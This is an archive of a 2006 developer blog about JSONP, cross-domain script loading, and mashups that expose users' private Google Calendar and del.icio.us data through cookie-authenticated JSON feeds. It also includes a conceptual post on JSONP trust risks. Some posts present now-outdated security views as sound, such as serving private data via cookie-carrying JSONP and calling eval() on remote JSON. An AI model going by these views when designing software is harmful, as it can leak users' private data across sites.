Thursday, October 26, 2006

JSONRequest by Douglas Crockford

Douglas Crockford is now considering a new native JavaScript Object. It's called "JSONRequest", like XMLHttpRequest.

http://ajaxian.com/archives/jsonrequest-proposal

I read the proposal a little, and found that it is eliminating cookie information in its request header.

http://www.json.org/JSONRequest.html

JSONRequest does not send or receive cookies or passwords in HTTP headers. This avoids false authorization situations. Knowing the name of a site does not grant the ability to use its browser credentials.


By ignoring cookies, this new crossdomain request approach might become safe, but on the other hand it throws aside a chance to enable personalized mashup. For example, if you wish to embed your e-mail inbox list in your favorite portal service, JSONRequest can't do that because they won't carry any cookies.

I think it might be better to have opt-in mechanisms for both remote services and end users. When considering that almost all ajax applications are now regarding JSON as only in the same domain, so opt-outing (like referer-based JSONP access control; this technique is used here!) is rather unsafe in this case.

Anyway, this is a new proposal, it may take some years to be embedded in almost all our browsers. I hope this opinion could reach him (or some communities) in some way or other.

Technorati tags: ,,

Monday, October 02, 2006

Yahoo BB Auth

Recently Yahoo! U.S. introduced an api which enables other developers to access their users' identity.
They call it "Browser-Based Authentication", and abbreviation is "Yahoo BB Auth".
http://developer.yahoo.com/auth/

I found that the naming was confusing, especially to Japanese Yahoo! users. Japanese telecom company Softbank and Yahoo Japan already branded their ADSL service as "Yahoo! BB". If you search "Yahoo BB", almost all entries are saying about this broadband internet service (currently). This implies that branding officer in Yahoo is not aware of their local services fully.

Anyway, This kind of service is interisting, and sounds nice to me. Google has already released its account authentication api. Maybe Flickr is the first (AFAIK) to open this kind of external access. This feature would be another must for future web 2.0 services.

But for the people who are moving ahead Liberty Alliance, or User-Centric Identity, this kind of movement might be unwelcome. Dick Hardt, CEO of Sxip, is saying "Yahoo/Google is deepening its identity silo". He says they aren't learning from the failure of MS .NET Passport.

User-centric, or distributed identity system is nice. I love it. But I'm afraid that the lack of this might not have been a main reason of the .NET Passport's failure. Currently it seems that users are not so unconfortable with their service, and developers are delighted with it. Who stops this opening movement of identity access, even if the api is a proprietary one? Because their service itself is absolutly proprietary, developers will not so be angry if the api is proprietary.

Technorati tags: , ,

Friday, September 01, 2006

JSONP Private Calendar Mashup with Simile Timeline

I've created interesting demo to show how Personalized Web 2.0 services can be used in mashup application.

http://www.geocities.jp/stormriders999/timeline.html

I'm using MIT Simile Timeline for dynamic user interface.

You'll see that your own private schedule data in Google Calendar is mashuped, only if you granted us to acess them.

Yes, it is actually personalized service for you.


Technorati tags: , , , , ,

Wednesday, August 30, 2006

Personalized JSONP - Google Calendar JSON Proxy Service

Google Account Authentication API and Google Calendar GData API enable us to integrate private schedule information with our applications, but they still requires us to deal with their own authentication protocol and host the program in some application server infrastructure.

Although it is read-only access, we can lookup remote feeds directly from browsers if it is provied in JSON style. JSONP is a well-known technique for this kind of JSON remoting.

But we currently don't have any JSON feeds in personalized contents, as far as I know. All JSON feeds in the internet are public - not personalized, accessible from everyone in the world.

Maybe it's because there're some security/privacy concerns. But I'm currently thinking that it would be OK to feed private data in JSON when some appropriate opt-in/out mechanizm is provided.

So, I've implemented JSON feed services for private data - Google Calendar schedule. Now 3rd party applications can get visitors' private calendar information so easily, as far as it is allowed to do that by them.

Please check out the site bellow :

Google Calendar JSON Proxy Service
http://gcal2json.ning.com/

Also there's a sample client application program.

http://www.geocities.jp/stormriders999/gcal_json_client_sample_e.html


Do you think this is really a good personalized web 2.0 service, don't you?

Technorati tags: , , , ,

Thursday, August 10, 2006

del.icio.us network JSON

del.icio.us has released network badge.

And also we can get JSON data.

http://del.icio.us/feeds/json/network/stomita

JSONP is also supported.

http://del.icio.us/feeds/json/network/stomita?callback=handleNetwork


This feature is not officially announced, though.

Technorati tags: , ,

Thursday, August 03, 2006

Custom Calendar App using Google Authentication API for WebApp

About 1 month ago, Google announced that they opened for 3rd party web apps to access their private data (of cource under the end user's allowance). But somehow I couldn't create any valid apps to access their actual service data. Maybe because Google had a service bug, or I misunderstood their protocol. However, today, I finally found the way to grab the private schedule feed entries from Google Calendar.

http://googleaccount.ning.com/

Click "Your private schedules in Google Calendar", and please say "Accept" when prompted by Google. I'm simply showing your calendar feeds. Not inserting, updating, deleting, and not evilly storing the retrieved information.

You can see the source code if you are a member of ning.


Monday, July 03, 2006

Google Account Authentication and Identity Web Services

Recently Google announced the release of their account authentication API for web applications. In a nutshell, they allowed other web apps to use their account information to login, which is very similar to Single Sign-On.

But the different part of this service from just SSO is Google is providing not only their authentication system, but also their application service endpoints to 3rd parties.

Here I describe simplified sequence of Google's authentication system. First, a web app receives a one-time-valid token from Google through an accessing user. Using this token, the web app queries Google to get further token to access application services. Finally, the token enables the web app to access the user's private information (inbox, schedules), which are kept by the Google's web application services (Gmail, Google Calendar).

Of course it is important to make sure there's a process to obtain user's consent before sending tokens to the web app. In this process, user can check the web app is trustworthy or not, and if he find it is trustworthy, he can allow the accesss to his private information with limited priviledge (e.g. READ ONLY, WRITE is NOT allowed)

In fact, as the words of "service endpoints to 3rd parties" implies, this story is far more related to "mashup" story, rather than "identity" story.

Nowadays almost all mashup services are public. For example, Amazon's search service returns same results if the given conditions are the same. Google Maps doesn't change its map information according to login user. They are only providing non-restricted public web services, whose service interface is not HTML but XML or JavaScript.

Of course some mashuppers which have their own users might mashup their information to the public web services, but the user private information itself is rarely opened to the others so far.

I think this situation is partly caused by the decision of the top exective which regards their user space as their own property, and partly caused by the difficulties to implement privacy system in these services.

Liberty Alliance and other identity federation standards offered to leverage this technical issues. Putting standard protocols, supporting vendors to implement their products, finally they are approaching executives to convince them to adopt their standards.

Although this approach is suceeded in some part of the market - like European mobile careers or American B2B services - their first big picture was "to be an identity infrastructure in all of the web world", and current situation is far from it. They may insist that they're still in the middle of the way, but they are doing same activity already for 5 years. Liberty itself seems no more vivid and not having any passion to change the world.

Let's go back to slight older days. I remember the first company who did want to dominate the web identity world - Microsoft. Their passport is now branded as a failure, but their primary purpose was just same as that of current Google - to offer identity web services to the 3rd parties, over the Microsoft (Google) platform. Passport failed without any strong supports by users. It is maybe because they couldn't offer solutions to the existing privacy concerns (maybe explanations are not sufficient), or because their excessive constration - this fault was later overcomed by Liberty - was not suitable to any existing services.

If Google is doing totally same as Microsoft, why they should repeat this failure history ? Some blogger says "it's like deja vu". But by following reasons I think this service will be supported in certain people.


  1. It is a platform provided by service provider

    • Google already has many attractive services. Developers are definitely going to have an interest in mashuping them. Owing to Google's massive user space, 3rd partiy contributers will receive many incentives.

    • Microsoft, I think, was originally much like platform-oriented, rather than service-oriented. Their services were going to be supplied afterward, benefits obtained by adopting their platform were not so clear for both end users and 3rd parties.



  2. It is a developer-oriented service

    • Different from existing enterprise-oriented authentication services, developers can use the service freely even if they are individuals. By disclaiming service fees essentially and delegating trust resolution to the users, it solves the complex problem around contracts. These openness will attract so many developers, it may cause big explosion in Internet level.

    • Liberty was a little messy for developers. The specification establishment process was open, but actually it was dominated by the famous software vendors. And Liberty promoters took so much focus on topdown approach. While they were eager to conceive conservative exectives, other identity standards or proprietary identity web services had spread in the web world.



  3. Other service providers will follow it

    • Google is now becoming a rare brand which can effect c-level only by its name, at least, in some enterprises which is based on the same profit model as Google (= Ad.). For these companies, Google is not only a threat but also an important reference model. Actually, Yahoo! U.S. has already announced the plan to introduce authentication service.

    • As a result of newcomers in open identity platform field, the business model of that platform will be recognized by other service providers, possibly establishing certain market.





It might be an irony for the people who has been saying that the unicentrism is evil, like Liberty Alliance or recent user-centric identity supporters (they are saying that even Liberty is not giving "liberty" for end users). But the user-centric identity is some kind of emerging one, so they might merge (or absorb) it in the future.


Friday, June 02, 2006

Google AJAX Search and JSON Web Sevice Calling

In this blog I've mentioned about remoting technology using JSON in dynamic script loading (JSONP). It's great because it doesn't require any app server for mashuping services, and scales well.

Among major service providers, first, del.icio.us noticed that and widely introduced for the developers, and then Yahoo implemented same feature but even more sophisticated one. Amazon's xslt feature enables same service. However, the giant google didn't have any service interface for browser applications (except Google Maps) so far.

But finally they introduced 'Google AJAX Search'.

This enables you to embed Ajax-style search box in your site. No proxy server is needed. Static html would be enough to host the service.

I've checked how the Ajax search is working, and found that they are also using JSON with padding technique. Here is a url that is used in background communication (be sure that it is not XMLHttpRequest call!) :

http://www.google.com/uds/GwebSearch?callback=GwebSearch.RawCompletion&lstkp=0&context=0&rsz=small&hl=ja&q=Google&key=internal-documentation&v=0.1


This is a good news for me because I can add this google service to my JSON with padding test page. I'm offering Yahoo, Amazon, del.icio.us, and generic rss2json service test. But while implementing Google's JSONP test, I found that the response interface is a little different from others. So I've slightly modified JSONP stub javascript class with caution, not to affect other services.

This is my JSON with padding test page.
http://www.geocities.jp/stormriders999/jsontest.html



Technorati tags: , , ,

Monday, May 22, 2006

dojo 0.3.0 supports JSONP

Dojo 0.3.0 has released a few days ago (? actually I'm not sure exactly when), and it is said that the release supports JSONP callback style in ScriptSrcIO.

http://archive.dojotoolkit.org/nightly/tests/io/test_ScriptSrcIO.html


So, if you are dojo toolkit user, your AJAX applications can easily connect to the several data sources in the internet - like Yahoo, del.icio.us, Amazon, and Google (Reader) - without consuming your server resources. Yes, it is completely cross-domain AJAX.

Technorati tags: , , ,

Monday, May 01, 2006

Del.icio.us brows.er

I've created another tool : del.icio.us brows.er .

Interface looks like del.icio.us direc.tor, but brows.er has so much difference from direc.tor.

  • No bookmarklet. Just access to the page linked above.

  • No server hosting environement. You can run even in your local PC. Please check it by saving the site as a html doc.

  • No api authentication. All data is gotten via JSON public feeds.

  • Not restricted to your posts. All del.icio.us users' posts are browsable.



Technorati tags: , ,

Friday, April 14, 2006

JSON Feeds of Google Reader

You may know "Google Reader" - kind of online RSS reader - are providing publishing feature for your labeled and publicly opened feeds. You can copy the code and paste it to your blog.

For example, this is my feeds about web 2.0.




If you can check the source HTML code of this page, you might notice that this is some kind of JSON with padding (JSONP) call. Actually, you can check what feed data is sent from Google via following URLs :

http://www.google.com/reader/public/javascript/user/03853986730064725171/label/web2.0?n=5

http://www.google.com/reader/public/javascript/user/03853986730064725171/label/web2.0?n=5&callback=hello

The most intuitive way to see the JSONP services, I think, is to use my JSON with Padding Tester. Arbitrary JSONP services (including Yahoo, del.icio.us, or Amazon with xslt) can be visualized using this tester. Of course it is useful for this Google's JSON service.


Technorati tags: , , , ,

Wednesday, March 01, 2006

Name Changed : My Del.icio.us Recommendation Snippet

Recently I noticed that original del.icio.us is providing "Del.icio.us Recommendation Engine", so I changed the name of this module to "My Del.icio.us Recommendation Snippet".

This confliction is because I named it so easy way, but anyway these two are totally different. The former (original) is an internal functionality in del.icio.us service itself, and the latter (I created) is a script snippet using del.icio.us JSON call interface, which can be embedded in arbitrary web site.

Wednesday, February 22, 2006

Why del.icio.us recommendation engine is not personalized 2.0 ?

First, you have to tell your del.icio.us ID to your visiting site. In principle, it's not necessary. Because what we need is your recent tagging information, not your id. Unfortunately, to get your bookmark information, the site owner have to know your del.icio.us id. This is derived from del.icio.us's feed interface. But, in general, forcing to tell someone's unique id is not preferable from the aspect of privacy.

Second, this module doesn't consider the case where identity information is originally access controlled. Del.icio.us bookmarks are apparently identity information, but it's not restricted, always published for general public. In order to deal with every identity-aware web services, we have to consider the case where services are access controlled.

These are not only the issues in personalized 2.0 services. If I have a time I can pick up many other issues to be solved.

Del.icio.us Recommendation Engine

While researching recent del.icio.us's native support of JSONP, an interesting idea hit me and fired up my imagination. Devoting recent days to this development, and finally I created an attractive script moudule. "Del.icio.us Recommendation Engine", I call it.

"Del.icio.us Recommendation Engine" is a recommendation link list generator extracted from site owner's bookmarks archived in del.icio.us. If you tell your del.icio.us ID to the site, you can get the site owner's bookmarks as a recommendation. While creating your recommendation list, your recent del.icio.us posts and associated tags automatically used as your preference information.

It is cool because we don't need any server infrastructure for generating recommendation list. Entire generation process is done in client side Javascript. JSON (or JSONP) and On-Demand JavaScript techniques are used to get del.icio.us posts.

Seeing is believing. Please look and see it.

I think it is a kind of interesting module, but I don't think it is the final achivement of my personalized 2.0 project. Yes, this module does some kind of personalization for the visitors, but techniques used in this module cannot be used in many cases. I think there're many issues to be solved there in order to be a generic personalized web 2.0 service solution.

Anyway, I created some "personalized 2.0 like " service module. It's totally fun. Enjoy yourself.

Thursday, February 16, 2006

Del.icio.us is Now Doing JSONP, or Callback Support

I don't know when del.icio.us began the JSON service, but the JSON interface for their bookmark information was only kind of static one. Through static 'Delicious' javascript object we can get posts. So it is not apparently supporting parallel queries (will destroy each other's results), and does not consider name confliction.

But while doing test of JSON with Padding Tester (JSONP Tester), I found that they are implementing callback function parameter like Yahoo.

Check out this.

http://del.icio.us/feeds/json/stomita?callback=JsonUtil.responseCallbacks%5B0%5D


It is not mentioned official web help page and couldn't find any articles about this new feature. I'm not sure when they implemented it (maybe old).

Anyway I included del.icio.us call in JSONP Tester page.


Technorati tags: , , , ,

JSONP Service and Security

Before talking about shared services, I have to clarify what issues (or concerns) are now discussed about JSONP services (maybe not so discussed, because there're less services than usual REST XML or SOAP Web Services). Especially, I'm going to focus security concerns. Because XMLHttpRequest itself doesn't allow the request other than the original html source site (same-origin policy), there might be same or similar concerns in JSONP service.

Let's consider Site Y is a JSONP service site (like Yahoo), and Site M is your JSONP mashup site, and User u is a visitor to Site M. Site O is a simple web service provider nothing related to these services, but might be an atacker's target.

(Note that these are only my guesses)


If M is malicious, can M steal the identity information of u in Y ?



M cannot steal it without cooperation of Y. If Y have a unrestricted JSONP interface to access u's identity information, M can. If there's no consent of u, Y should be responsible for unintended usage of u's identity information.


If Y is malicious, can Y effect bad thing (information theft, session hijack) to M ?



Absolutely Y can. The loaded JSONP service does not always have to provide JSON object, it's nothing other than JavaScript and the code format itself is all under the control of Y. Loaded code is automatically executed without any validation (this is a key point of JSONP) and the excecution priviledge become that of Site M. So M have to do trust Y as long as M is using Y's service.


If Y become suddenly malicious, and the loaded code effected bad to M, who is responsible ?



Of course Y is responsible basically. If the information theft is u's identity information in M, M also should be responsible (about unintended usage of u's identity information).


If Y is malicious, Can Y attack O ?



Yes, for example, requesting huge amout of requests to O. And - similar to DDoS - the attacking context become that of User u. But it's not so special case in JSONP service because any malicious site can do that. The main concern here is trust. If User u trusted Site M, and not knowing M is using Y's service (and u might be not trusting Y), M was responsible for prior explanation about using Y's services, because, if notified, u might not have used the M's service. And M should also be responsible for Site O


Can Y steal the identity information of u in Site O ?



Basically no. If there were vulnerabilities in O it might be yes. If u accepted the usage of cross domain XMLHttpRequest in some way (browser setting?), it might also be yes, but it's under u's responsibility.


Can Y affect the transaction between u and O ?



Basically no. If there were vulnerabilities in O it might be yes. CSRF might be one of them. O should be responsible with its own vulnerability.

Technorati tags: , , ,

Saturday, February 11, 2006

JSON with Padding Tester

Against my previous post, this post doesn't go further about my project detail. Instead I'd like to show something created for my own project so far.

As I posted before, On-Demand Javascript and JSON combination is really nice, and a protocol called JSONP (JSON with Padding) is a good implementation (Yahoo is now doing similar way!). However, while XMLHttpRequest can be tested and monitored by some tools (like FireBug) ), jsonp seems cannot.

So I created a tiny testing tool to cover this. By JSON with Padding Test , you can test your jsonp service by putting and submitting your service url. Default input value is prefixed to the Yahoo Search Web Service url (with search keyword of 'google'), and jsonp url parameter is changed to 'callback' - could be changed by putting other preferred parameter name - so you can check easily what type of tool it is.

Technorati tags: , ,

Thursday, February 09, 2006

Remoting Technique in Personalized 2.0 Services

While I am wanting to connect to all services around the world, remoting from web browser is really needed. XMLHttpRequest, which is said to be a key element of Ajax, enables the browser to retrieve data asynchronously from server-side services. Due to this function, we can assume a web browser like a web service client. But by following reasons I don't like so much to use this.

The most disappointing thing about XMLHttpRequest is - it cannot reach services provided from other domains. This restriction might be come from some security or privacy concern. To avoid this restriction, a technique is often used, Cross Domain Proxy. However, the necessity of the server to be located in the same domain and proxy browser's all request prevents from scaling.

By the way, XMLHttpRequest is not the only one to get asynchronous data. There is another way for browser to retrieve service information dynamically - it is called On-demand Javascript and JSON combination.

JSON is a data format and can be directly parsed by Javascript engine. This is done by calling eval() function of Javascript. For some security reason eval function is not so recommended for the remotely retrieved data, but if the remote service itself is trusted eval() function is very useful.

However, in On-demand Javascript pattern, we don't use eval() function. There are several way to evaluate JSON data - del.icio.us JSON feed is one of the way to include remotely provided JSON object. The most useful way to do this is , I think, the idea called jsonp - (JSON padding). This is something like a protocol between JavaScript client and JSON server - giving callback function name inside of url parameter, and returning the Javascript callback function and JSON data as a function's argument. This idea is also seen in Yahoo Web Services with JSON output, and it works well.

One really good thing of On-demand Javascript and JSON, compared with XMLHttpRequest and Cross Domain Proxy, is that they don't have the complexity in authenticating user. Almost all web applications now maintain user's session by cookies, and they are automatically sent while requesting url. Because On-demand Javascript loading request is totally same as usual browser request, a JSON server can specify the requesting user by the cookies previously given.

On the other hand, Cross Domain Proxy can request remote resources, but the actual requester is local server, not browser, so no cookies available. Because authentication is always needed to access control or personalize service information, the local server has to keep the end user's credential for the remote service.

For these reasons, I adopt On-demand Javascript and JSON call for remoting technique. It can be regareded as one of the user centric approach. Anyway my true interest is to share personalized or individual data (that is, identity-aware data) from anywhere in the world. Next post is going to be about that.


Technorati tags: , , , ,

Wednesday, February 08, 2006

Blogging about "Personalized 2.0", now started

Influenced by the recent attractive movement, aka "web 2.0", I decided to start my project of new cutting-edge software development and blogging about it.

Although my native tongue is not English - I'm pure Japanese and living in Japan - it is worth for me to write this blog in English, because there seems to be enormous numbers of folks who interested in recent web movements, and my idea may attract them - at least I hope so.

Actually I'm now working at an enterprise software company, where I involved some web application software design - especially application security, identity management, or role-based access control. Recently in enterprise environment almost all companies are using Java or J2EE (except for MS), but most web developers seem to be using other script languages, like PHP, Ruby, or Perl. I'm not so familiar with these server-side scripting languages, but this is not so impact to my developing. All things required for developing web 2.0 software service is so common and standard based technologies - HTML, DOM, XML, or JavaScript.

As my blog title shows, my initial purpose of starting this blog and development project is to bring "personalized" feature in web 2.0 services. So far we have seen so many web 2.0 services, but almost all of them were public services, and not targeted to personal. Of course, they often have user accounts, and they can maintain their data by these end users' contribution, but the retrieved information from these services always become public one, that is, not access controlled.

Some might say this users' contribution for public information is the main web 2.0 feature and therefore it is worth, but I think it is limitting the opportunity of web 2.0. Imagine a mashup service which combine your address book records with google map. Such service is attractive and seems to be possible, but it requires the mashup site to correct and keep your address book information. This implies that services dealing personal data, like address book or schedule information, cannot be easily delivered like amazon book search service, yahoo web search service, or google maps - which is the representative of mashup ingredient.

Like flickr or evdb(eventful), there are services which have web API to access their personal data. But all succeeded mashup service using flickr is using public service API, not personalized. If some service providers would want to do a personalized flickr mashup, there are security and privacy concerns in giving credentials for them. Absolutely I don't want to give my flickr password to some unknown fishy sites, even if they are saying that they provide a great mashup service using flickr. I think it is one of the reasons which is preventing identity-aware web 2.0 services to spread.

Another considerable reason is that they only have XML web services API. To make XML call it needs some server infrastructure. All requests are processed or proxied by server, therefore service doesn't scale if given resource is poor. Compare with the mashup with google maps - no necessity to setup cgi, static web site is enough!

With these points in mind, I've started a project - "personalized 2.0", I'm calling. In this project, I will choose user centric approach, which may resemble with an approach called "identity 2.0". Later posts will explain more detail.

Technorati tags: ,